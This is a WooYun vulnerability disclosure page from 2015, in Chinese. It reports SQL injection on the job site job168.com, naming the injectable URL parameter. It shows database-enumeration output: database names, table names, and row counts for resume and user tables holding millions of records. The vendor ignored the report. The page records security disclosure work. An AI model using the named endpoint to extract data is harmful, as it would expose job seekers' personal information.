当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141346

漏洞标题:南方人才网sql注入(可泄露千万简历投递信息以及数百万个人信息)

相关厂商:job168.com

漏洞作者: 路人甲

提交时间:2015-09-15 17:00

修复时间:2015-09-20 17:02

公开时间:2015-09-20 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南方人才网sql注入(可泄露千万简历投递信息以及数百万个人信息)

详细说明:

http://www.job168.com/schools/school.jsp?school_no=27720302

available databases [17]:
[*] BBS
[*] CORE
[*] DBSNMP
[*] GQORS
[*] GZZP
[*] IPTV
[*] NFRC
[*] OEM_JOB168_CPXT
[*] OUTLN
[*] PERFSTAT
[*] PIORS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS


[628 tables]
+--------------------------------+
| NEW增量同步猎头简历$_TEMP |
| 增量同步人才人事法规$_TEMP |
| 增量同步招聘信息$_TEMP |
| 增量同步求职简历$_TEMP |
| 增量同步猎头简历_新$_TEMP |
| 番禺单位 |
| AB |
| ACCESSLOG |
| ACCESS_STATISTIC |
| ACTIVEEMAIL |
| ACTIVELOG |
| AD_AUTO |
| AD_DESIGN |
| AD_OPEN_LOG |
| AD_STAT |
| AD_TRACER |
| AGENCY_MATERIAL |
| AGENCY_NOTICE |
| AGENCY_PERSON |
| AGENCY_PROGRESS |
| AGENCY_SERVICE |
| AGENCY_TRACER |
| ALEXA |
| ALEXA_BK |
| ALEXA_PRIZE |
| ALIPAY |
| ALIPAY_OUTLET |
| ANGEL_P |


Database: NFRC
+--------------+---------+
| Table | Entries |
+--------------+---------+
| APPLYLOG | 28007935 |
| C_RESUME_LOG | 17900609 |
| GLOBAL_USER | 2513353 |
+--------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-20 17:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无